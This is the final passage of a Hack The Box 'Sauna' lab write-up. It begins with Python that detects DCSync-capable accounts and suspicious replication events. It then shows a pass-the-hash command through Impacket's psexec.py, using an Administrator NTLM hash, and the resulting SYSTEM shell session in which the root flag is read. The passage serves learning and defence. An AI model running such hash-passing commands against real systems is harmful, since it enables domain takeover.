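GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"           # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"       # DS-Replication-Get-Changes-All
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"  # ...-Get-Changes-In-Filtered-Set
REPLICATION_RIGHTS = {
    GET_CHANGES: "GetChanges",
    GET_CHANGES_ALL: "GetChangesAll",
    GET_CHANGES_FILTERED: "GetChangesInFilteredSet",
}


def dcsync_capable(edges):
    """edges: (principal, right, target) triples in the shape BloodHound stores them.
    The Cypher query above lists anyone holding any of the three rights; a full DCSync
    (what secretsdump.py performs) requires GetChanges AND GetChangesAll on the same
    domain, so this narrows the result to those principals."""
    held = {}
    for principal, right, target in edges:
        held.setdefault((principal, target), set()).add(right)
    return sorted(p for (p, _target), rights in held.items()
                  if {"GetChanges", "GetChangesAll"} <= rights)


def suspicious_replication(events, dc_accounts):
    """4662 events that exercised a replication right from something that is not a
    Domain Controller computer account. Legitimate replication partners are DCs;
    a user account doing this is a DCSync seen from the DC's side."""
    dc_accounts = {a.upper() for a in dc_accounts}
    hits = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        used = {REPLICATION_RIGHTS[g] for g in e["Properties"] if g in REPLICATION_RIGHTS}
        if used and e["SubjectUserName"].upper() not in dc_accounts:
            hits.append((e["SubjectUserName"], sorted(used)))
    return hits


DOMAIN = "EGOTISTICAL-BANK.LOCAL"

# Constructed edges: modelled on the write-up's outcome (svc_loanmgr can DCSync) plus a
# hypothetical account that holds only the filtered-set right and therefore cannot.
SAMPLE_EDGES = [
    ("SVC_LOANMGR@" + DOMAIN, "GetChanges", DOMAIN),
    ("SVC_LOANMGR@" + DOMAIN, "GetChangesAll", DOMAIN),
    ("HYPOTHETICAL_SYNC@" + DOMAIN, "GetChangesInFilteredSet", DOMAIN),
]

# Constructed 4662 records: legitimate replication by the DC's own computer account,
# a secretsdump-style request by svc_loanmgr, and an unrelated object access.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$",
     "Properties": [GET_CHANGES, GET_CHANGES_ALL]},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr",
     "Properties": [GET_CHANGES, GET_CHANGES_ALL]},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr",
     "Properties": ["deadbeef-0000-4000-8000-000000000001"]},  # placeholder, not a replication right
]
DC_ACCOUNTS = {"SAUNA$"}

if __name__ == "__main__":
    print(dcsync_capable(SAMPLE_EDGES))                        # ['SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL']
    print(suspicious_replication(SAMPLE_EVENTS, DC_ACCOUNTS))  # [('svc_loanmgr', ['GetChanges', 'GetChangesAll'])]
```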

Now that we’ve obtained the Administrator NTLM hash, we can perform a Pass-the-Hash attack to authenticate without needing the plaintext password.

Using psexec.py from the Impacket suite, we can pass the Administrator hash directly to the target and attempt to spawn a SYSTEM-level shell.

jbrown@Jabaris-MacBook-Pro examples % psexec.py [email protected] cmd.exe -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.129.4.62.....
[*] Found writable share ADMIN$
[*] Uploading file AteBLZgF.exe
[*] Opening SVCManager on 10.129.4.62.....
[*] Creating service yYmd on 10.129.4.62.....
[*] Starting service yYmd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32> cd ../

C:\Windows> cd ../

C:\> cd Users

C:\Users> cd Administrator

C:\Users\Administrator> dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC

Directory of C:\Users\Administrator

01/25/2020 01:05 PM <DIR> .
01/25/2020 01:05 PM <DIR> ..
01/23/2020 03:11 PM <DIR> 3D Objects
01/23/2020 03:11 PM <DIR> Contacts
07/14/2021 02:35 PM <DIR> Desktop
01/23/2020 03:11 PM <DIR> Documents
01/23/2020 03:11 PM <DIR> Downloads
01/23/2020 03:11 PM <DIR> Favorites
01/23/2020 03:11 PM <DIR> Links
01/23/2020 03:11 PM <DIR> Music
01/23/2020 03:11 PM <DIR> Pictures
01/23/2020 03:11 PM <DIR> Saved Games
01/23/2020 03:11 PM <DIR> Searches
01/23/2020 03:11 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 7,796,477,952 bytes free

C:\Users\Administrator> cd Desktop

C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC

Directory of C:\Users\Administrator\Desktop

07/14/2021 02:35 PM <DIR> .
07/14/2021 02:35 PM <DIR> ..
02/22/2026 07:05 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,796,477,952 bytes free

C:\Users\Administrator\Desktop> type root.txt
****ROTFLAGHERE*******

C:\Users\Administrator\Desktop>

And that concludes the Sauna machine from Hack The Box.

This box was a great exercise in understanding how small pieces of information — such as exposed employee names — can evolve into full domain compromise when combined with proper enumeration and protocol abuse. From AS‑REP Roasting to DCSync and Pass‑the‑Hash, each step reinforced the importance of thinking through attack paths instead of relying solely on automated tooling.

Working through this machine helped solidify my understanding of:

  • Kerberos authentication flow
  • The impact of disabled preauthentication
  • Offline hash cracking
  • BloodHound attack path analysis
  • Active Directory replication abuse (DCSync)

More importantly, it forced me to slow down, research what I didn’t fully understand, and explain each concept in my own words. That process alone has been just as valuable as completing the box itself.

On to the next one.


Source: https://infosecwriteups.com/%EF%B8%8Fhow-anonymous-ldap-enumeration-led-to-as-rep-roasting-and-domain-compromise-0f6d71b0d7a1?source=rss----7b722bfd1b8d---4